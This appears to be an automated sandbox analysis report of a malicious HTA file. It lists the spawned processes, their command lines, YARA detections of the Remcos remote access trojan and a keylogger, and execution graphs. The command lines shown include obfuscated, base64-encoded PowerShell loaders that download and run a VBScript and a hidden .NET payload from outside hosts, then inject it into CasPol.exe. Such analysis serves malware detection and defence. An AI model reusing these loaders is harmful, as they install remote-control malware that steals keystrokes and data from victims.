                                                                            2024-12-17 06:21:44 UTC1369INData Raw: 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72 50 75 36 44
                                                                            Data Ascii: w0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu6D


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:01:21:06
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta"
                                                                            Imagebase:0x250000
                                                                            File size:13'312 bytes
                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:01:21:07
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:01:21:07
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:01:21:07
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                                                                            Imagebase:0x730000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:01:21:11
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline"
                                                                            Imagebase:0x4d0000
                                                                            File size:2'141'552 bytes
                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:01:21:12
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE59.tmp" "c:\Users\user\AppData\Local\Temp\xduntapu\CSC441F3FFBBAD0418BBB746B4643CA251D.TMP"
                                                                            Imagebase:0x1a0000
                                                                            File size:46'832 bytes
                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:01:21:17
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS"
                                                                            Imagebase:0x250000
                                                                            File size:147'456 bytes
                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:01:21:18
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem
                                                                            Imagebase:0x730000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:01:21:18
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0xb60000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:12
                                                                            Start time:01:21:44
                                                                            Start date:17/12/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                            Imagebase:0x4c0000
                                                                            File size:108'664 bytes
                                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4168215268.000000000258F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Reset < >
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1720790606.0000000006520000.00000010.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6520000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b8fa7c0227f2106f99ef0984a7a7ee88b25d522f20124f60d108fa7a5f4ec093
                                                                              • Instruction ID: 8790d910bbdb16d2b772fabc77e6aafdfe08365765f4a98b728df0d6c04dfeac
                                                                              • Opcode Fuzzy Hash: b8fa7c0227f2106f99ef0984a7a7ee88b25d522f20124f60d108fa7a5f4ec093
                                                                              • Instruction Fuzzy Hash: E1014F71B4021A9FD750CFACC882BEEB7F9BB49610F580429A204F3281D774A9418B90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1720815223.0000000006180000.00000010.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6180000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: ac619f0ca0dda0d176a799f87567320b9cf4b494ea8626ce2741881bb463feed
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1720815223.0000000006180000.00000010.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6180000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: ac619f0ca0dda0d176a799f87567320b9cf4b494ea8626ce2741881bb463feed
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1720815223.0000000006180000.00000010.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6180000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: ac619f0ca0dda0d176a799f87567320b9cf4b494ea8626ce2741881bb463feed
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1720815223.0000000006180000.00000010.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_6180000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction ID: ac619f0ca0dda0d176a799f87567320b9cf4b494ea8626ce2741881bb463feed
                                                                              • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                              • Instruction Fuzzy Hash:

                                                                              Execution Graph

                                                                              Execution Coverage:4.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:48
                                                                              Total number of Limit Nodes:5
                                                                              execution_graph 9304 34d7480 9306 34d74be 9304->9306 9305 34d75df 9307 34d764b 9306->9307 9312 34d7a08 9306->9312 9320 34d7c45 9306->9320 9327 34d7da8 9306->9327 9334 34d7a18 9306->9334 9316 34d7a14 9312->9316 9313 34d7b30 9313->9305 9315 34d7ea8 9315->9305 9316->9313 9317 34d7d57 URLDownloadToFileW 9316->9317 9342 79e45f5 9316->9342 9351 79e4610 9316->9351 9317->9315 9324 34d7b9a 9320->9324 9321 34d7d57 URLDownloadToFileW 9323 34d7ea8 9321->9323 9323->9305 9324->9321 9325 79e45f5 4 API calls 9324->9325 9326 79e4610 4 API calls 9324->9326 9325->9321 9326->9321 9328 34d7cf9 9327->9328 9332 79e45f5 4 API calls 9328->9332 9333 79e4610 4 API calls 9328->9333 9329 34d7d57 URLDownloadToFileW 9331 34d7ea8 9329->9331 9331->9305 9332->9329 9333->9329 9338 34d7a1c 9334->9338 9335 34d7b30 9335->9305 9337 34d7ea8 9337->9305 9338->9335 9339 34d7d57 URLDownloadToFileW 9338->9339 9340 79e45f5 4 API calls 9338->9340 9341 79e4610 4 API calls 9338->9341 9339->9337 9340->9339 9341->9339 9344 79e4608 9342->9344 9343 79e4a93 9343->9317 9344->9343 9346 34d7a08 5 API calls 9344->9346 9347 34d7a18 5 API calls 9344->9347 9348 34d7da8 5 API calls 9344->9348 9349 34d7c45 5 API calls 9344->9349 9360 34d1c00 9344->9360 9345 79e4a34 9345->9317 9346->9345 9347->9345 9348->9345 9349->9345 9353 79e4614 9351->9353 9352 79e4a93 9352->9317 9353->9352 9355 34d7a08 5 API calls 9353->9355 9356 34d7a18 5 API calls 9353->9356 9357 34d7da8 5 API calls 9353->9357 9358 34d7c45 5 API calls 9353->9358 9359 34d1c00 URLDownloadToFileW 9353->9359 9354 79e4a34 9354->9317 9355->9354 9356->9354 9357->9354 9358->9354 9359->9354 9361 34d7e00 URLDownloadToFileW 9360->9361 9363 34d7ea8 9361->9363 9363->9345

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 178 34d7a18-34d7a4a 181 34d7a4c-34d7a53 178->181 182 34d7a90 178->182 183 34d7a55-34d7a62 181->183 184 34d7a64 181->184 185 34d7a93-34d7acf 182->185 186 34d7a66-34d7a68 183->186 184->186 194 34d7b58-34d7b63 185->194 195 34d7ad5-34d7ade 185->195 188 34d7a6f-34d7a71 186->188 189 34d7a6a-34d7a6d 186->189 192 34d7a73-34d7a80 188->192 193 34d7a82 188->193 191 34d7a8e 189->191 191->185 196 34d7a84-34d7a86 192->196 193->196 197 34d7b65-34d7b68 194->197 198 34d7b72-34d7b94 194->198 195->194 199 34d7ae0-34d7ae6 195->199 196->191 197->198 207 34d7c5e-34d7d52 198->207 208 34d7b9a-34d7ba3 198->208 201 34d7aec-34d7af9 199->201 202 34d7de8-34d7e52 199->202 204 34d7b4f-34d7b56 201->204 205 34d7afb-34d7b2e 201->205 218 34d7e5d-34d7e63 202->218 219 34d7e54-34d7e5a 202->219 204->194 204->199 216 34d7b4b 205->216 217 34d7b30-34d7b33 205->217 255 34d7d55 call 79e45f5 207->255 256 34d7d55 call 79e4610 207->256 208->202 211 34d7ba9-34d7be7 208->211 227 34d7be9-34d7bff 211->227 228 34d7c01-34d7c14 211->228 216->204 221 34d7b3f-34d7b48 217->221 222 34d7b35-34d7b38 217->222 223 34d7e65-34d7e6e 218->223 224 34d7e71-34d7ea6 URLDownloadToFileW 218->224 219->218 222->221 223->224 229 34d7eaf-34d7ec3 224->229 230 34d7ea8-34d7eae 224->230 231 34d7c16-34d7c1d 227->231 228->231 230->229 233 34d7c1f-34d7c30 231->233 234 34d7c42 231->234 233->234 238 34d7c32-34d7c3b 233->238 234->207 238->234 249 34d7d57-34d7d60 250 34d7d7a-34d7d8d 249->250 251 34d7d62-34d7d78 249->251 252 34d7d8f-34d7d96 250->252 251->252 253 34d7d98-34d7d9e 252->253 254 34d7da5 252->254 253->254 254->202 255->249 256->249
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1827140039.00000000034D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_34d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 5-'j
                                                                              • API String ID: 0-2709927967
                                                                              • Opcode ID: bcdd0c0fe6883cf4fdaa180e0254590d389f0b107343c38d9e1414e30a344c82
                                                                              • Instruction ID: 858e2a7ddb9fe2453452a37d683143cfdfab6fc520413ac685f00858b09f6173
                                                                              • Opcode Fuzzy Hash: bcdd0c0fe6883cf4fdaa180e0254590d389f0b107343c38d9e1414e30a344c82
                                                                              • Instruction Fuzzy Hash: D9E10675A00219EFCB05CF98D594A9EFFB2FF48310F24815AE814AB365C735E981CB94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
